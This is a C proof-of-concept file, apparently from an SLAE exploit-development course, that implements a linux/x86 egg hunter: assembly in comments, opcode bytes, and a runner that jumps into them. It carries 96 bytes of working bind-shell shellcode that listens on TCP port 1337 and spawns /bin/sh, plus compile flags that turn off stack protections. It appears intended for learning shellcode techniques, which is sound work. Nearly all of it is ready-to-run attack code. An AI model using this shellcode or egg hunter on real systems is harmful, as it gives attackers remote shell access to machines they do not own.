/* * Title: Egg Hunter PoC * Platform: linux/x86 * Date: 2015-01-07 * Author: Dennis 'dhn' Herrmann * Website: https://zer0-day.pw * Github: https://github.com/dhn/SLAE/ * SLAE-721 */ /* * egg_hunter.nasm * --------------- * BITS 32 * * global _start * section .text * * EGG_SIG equ 0x4f904790 ; signature * * _start: * cdq ; zero out edx * mov edx, EGG_SIG ; edx = 0x4f904790 * * search_the_egg: * inc eax ; increment eax * cmp DWORD [eax], edx ; compare eax with the EGG_SIG * jne search_the_egg ; if not compare jump to search_the_egg * * jmp eax ; jump to eax * */ #include #include /* * Egg Signature: * * 0x4f 0x90 0x47 0x90 * | | | | * dec edi - NOP - inc edi - NOP */ #define EGG_SIG "\x90\x47\x90\x4f" unsigned char egg_hunter[] = \ "\x99" /* cdq */ "\xba\x90\x47\x90\x4f" /* mov edx, 0x4f904790 */ "\x40" /* inc eax */ "\x39\x10" /* cmp DWORD PTR [eax], edx */ "\x75\xfb" /* jne 6 */ "\xff\xe0"; /* jmp eax */ /* * Bind Shell TCP shellcode - 96 byte * bind to port: 1337 */ unsigned char shellcode[] = \ EGG_SIG /* Egg Signature */ "\x6a\x66\x58\x6a\x01\x5b\x31\xf6" "\x56\x6a\x01\x6a\x02\x89\xe1\xcd" "\x80\x5f\x97\x93\xb0\x66\x56\x66" "\x68\x05\x39\x66\x6a\x02\x89\xe1" "\x6a\x10\x51\x57\x89\xe1\xcd\x80" "\xb0\x66\xb3\x04\x56\x57\x89\xe1" "\xcd\x80\xb0\x66\xb3\x05\x56\x56" "\x57\x89\xe1\xcd\x80\x93\x31\xc9" "\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80" "\x75\xf8\x6a\x0b\x58\x31\xc9\x51" "\x68\x2f\x2f\x73\x68\x68\x2f\x62" "\x69\x6e\x89\xe3\x89\xca\xcd\x80"; /* * $ gcc -Wl,-z,execstack -fno-stack-protector PoC.c -o PoC * [+] Egg Hunter Length: 13 * [+] Shellcode Length + 4 byte egg: 100 * */ void main() { printf("[+] Egg Hunter Length: %d\n", strlen(egg_hunter)); printf("[+] Shellcode Length + 4 byte egg: %d\n", strlen(shellcode)); int (*ret)() = (int(*)())egg_hunter; ret(); }